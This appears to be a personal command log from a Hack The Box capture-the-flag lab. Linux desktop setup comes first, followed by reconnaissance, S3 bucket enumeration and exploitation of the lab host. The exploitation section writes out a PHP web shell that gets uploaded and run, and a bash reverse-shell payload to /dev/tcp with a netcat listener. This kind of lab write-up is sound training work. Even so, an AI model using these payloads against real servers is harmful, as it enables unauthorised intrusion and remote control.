Skip to content

HTB Challenge Commands - December 24, 2025

System Setup & Package Management

Initial Updates & Editor Setup

sudo apt update
sudo update-alternatives --config editor
visudo

Vim Installation & Configuration

sudo apt install vim
sudo apt-get update && sudo apt-get install vim
sudo apt install vim-common
which vim
vi .bashrc
source .bashrc

Application Launchers

sudo apt install ulauncher
sudo apt install synapse
synapse

Git Installation

sudo apt install git

i3 Window Manager Setup

sudo apt install i3 polybar rofi picom nitrogen lxappearance

Create i3 Configuration Structure

cd ~/.config/
mkdir i3 polybar picom rofi

i3 Config Files

vim i3/config
vim polybar/launch.sh
chmod +x ~/.config/polybar/launch.sh
vim polybar/config.ini
vim picom/picom.conf
vim rofi/config.rasi

Set Wallpaper

nitrogen

i3 Keybindings Reference

cat > ~/i3-keybinds.md << 'EOF'
# i3 Keybindings Reference
**Mod key = Command (⌘) on MacBook**

## Core Commands
- `Mod+Enter` - open terminal
- `Mod+d` - app launcher (dmenu/rofi)
- `Mod+Shift+q` - kill focused window
- `Mod+Shift+e` - exit i3
- `Mod+Shift+r` - restart i3 (reload config)
- `Mod+Shift+c` - reload config without restart

## Window Navigation
- `Mod+h/j/k/l` - move focus left/down/up/right (vim style)
- `Mod+arrow keys` - also works for focus
- `Mod+Shift+h/j/k/l` - move window left/down/up/right
- `Mod+Shift+arrows` - also moves windows

## Workspaces
- `Mod+1` through `Mod+9` - switch to workspace 1-9
- `Mod+Shift+1` through `Mod+9` - move window to workspace

## Layout
- `Mod+e` - toggle split horizontal/vertical
- `Mod+s` - stacking layout
- `Mod+w` - tabbed layout
- `Mod+f` - fullscreen toggle
- `Mod+Shift+space` - toggle floating

## Splitting
- `Mod+h` - split horizontal
- `Mod+v` - split vertical

## Resizing
- `Mod+r` - enter resize mode
- Then `h/j/k/l` or arrows to resize
- `Esc` or `Enter` - exit resize mode
EOF

Clean i3 Setup

cd ~
mkdir -p i3-setup/{i3,polybar,picom,rofi}
cd i3-setup
rm -rf ~/.config/i3 ~/.config/polybar ~/.config/picom ~/.config/rofi

Theme Setup

Dracula Theme Installation

cd ~/Downloads
wget https://github.com/dracula/gtk/archive/master.zip
unzip master.zip
mkdir -p ~/.themes
cp -r gtk-master ~/.themes/Dracula
vim ~/.themes/Dracula/index.theme

Dracula Icons

git clone https://github.com/dracula/gtk.git ~/Downloads/dracula-icons
sudo cp -r ~/Downloads/dracula-icons/kde/cursors/Dracula-cursors /usr/share/icons/

HTB Challenge - Reconnaissance

Network Scanning

nmap -sV -sT 10.129.227.248
nmap -sV -sT -p- 10.129.227.248
nmap -sV -sT -p- s3.thetoppers.htb

Hosts File Configuration

sudo vim /etc/hosts
# Added: 10.129.227.248 s3.thetoppers.htb thetoppers.htb
ping s3.thetoppers.htb

Initial Web Enumeration

curl s3.thetoppers.htb
curl -s http://thetoppers.htb | wc -c
curl http://s3.thetoppers.htb/thetoppers.htb/index.php
curl http://thetoppers.htb/action_page.php

Directory & Subdomain Enumeration

Gobuster Installation & Usage

sudo apt install gobuster

Directory Enumeration

gobuster dir -u http://s3.thetoppers.htb -w ~/SecLists/Discovery/Web-Content/common.txt
gobuster dir -u http://thetoppers.htb -w ~/SecLists/Discovery/Web-Content/common.txt

Subdomain Enumeration

gobuster dns -d thetoppers.htb -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

S3 Bucket Enumeration

gobuster s3 -h
gobuster s3 -w ~/SecLists/Discovery/Web-Content/common.txt

Fuzzing Tools

ffuf Installation & Usage

sudo apt install ffuf

Subdomain Fuzzing

ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.thetoppers.htb
ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -mc all
ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -mc all -fs 11952

wfuzz Installation & Usage

sudo apt install wfuzz
wfuzz -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.thetoppers.htb" http://10.129.227.248

Wordlists Setup

SecLists Installation

sudo apt install seclists  # Failed - package not in repos
sudo vim /etc/apt/sources.list  # Added proper repos
cd ~
git clone https://github.com/danielmiessler/SecLists.git

AWS CLI & S3 Bucket Enumeration

AWS CLI Setup

sudo apt install awscli
aws configure
# Access Key: test
# Secret Key: test
# Region: us-east-1
# Format: json

S3 Bucket Discovery

aws s3 ls --endpoint-url http://s3.thetoppers.htb
# Found: thetoppers.htb bucket

S3 Bucket Content Enumeration

aws s3 ls s3://thetoppers.htb --endpoint-url http://s3.thetoppers.htb --recursive
aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive
aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive --include ".*"

Download S3 Bucket Contents

aws s3 sync s3://thetoppers.htb . --endpoint-url http://s3.thetoppers.htb

S3 API Operations

aws s3api get-bucket-acl --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
aws s3api list-object-versions --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
aws s3api get-bucket-tagging --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
aws s3api list-objects --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb

File Analysis

Search Downloaded Files

ls
cat index.php
cat index.php | grep email
cat index.php | grep flag
vim index.php
cat .htaccess

Image Files

ls images/
cd images/
open band2.jpg
open band3.jpg
open final.jpg
cd ..

Search for Sensitive Files

find . -name "*flag*"
find . -name "*.pem" -o -name "*key*" -o -name "id_rsa*"
aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive | grep -i "key\|ssh\|pem"

Exploitation - PHP Web Shell

File Upload Test

touch test.txt
aws s3 cp test.txt s3://thetoppers.htb/test.txt --endpoint-url http://s3.thetoppers.htb

PHP Web Shell Creation & Upload

echo "<?php system(\$_GET['cmd']); ?>" > shell.php
aws s3 cp shell.php s3://thetoppers.htb/shell.php --endpoint-url http://s3.thetoppers.htb

Remote Command Execution

curl http://thetoppers.htb/shell.php?cmd=ls
curl http://thetoppers.htb/shell.php?cmd=ls%20-a
curl http://thetoppers.htb/shell.php?cmd=ll
curl http://thetoppers.htb/shell.php?cmd=cat%20flag.txt

Reverse Shell Attempt

Check VPN IP

ip addr show tun0 | grep inet

Create Reverse Shell

cat > shell.php << 'EOF'
<?php
system("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
?>
EOF

vim shell.php  # Edit to add actual IP

Setup Listener

nc -lvnp 4444

SSH Attempts

SSH Connection Attempts

ssh root@10.129.227.248

Utilities

Screenshots

mate-screenshot

Browser

firefox

Command History Export

mkdir htb_commands_history
history > ~/htb_commands_history/htb_commands_dec24.txt

Key Findings

  1. S3 Bucket Discovery: Found thetoppers.htb bucket via AWS CLI
  2. Email Found: mail@thetoppers.htb in index.php contact section
  3. Subdomain Discovery: s3.thetoppers.htb via vhost fuzzing
  4. File Upload: S3 bucket allows file uploads
  5. RCE Achieved: PHP web shell uploaded and executed successfully
  6. Flag Location: Flag located via ls ../ command through web shell

Lessons Learned

  • Always test uploaded web shells immediately with simple commands
  • LocalStack S3 emulator behaves differently than real AWS S3
  • Vhost fuzzing (-H "Host: FUZZ") works when DNS enumeration fails
  • AWS CLI is essential for S3 bucket enumeration and manipulation
  • File upload to S3 + web execution = easy RCE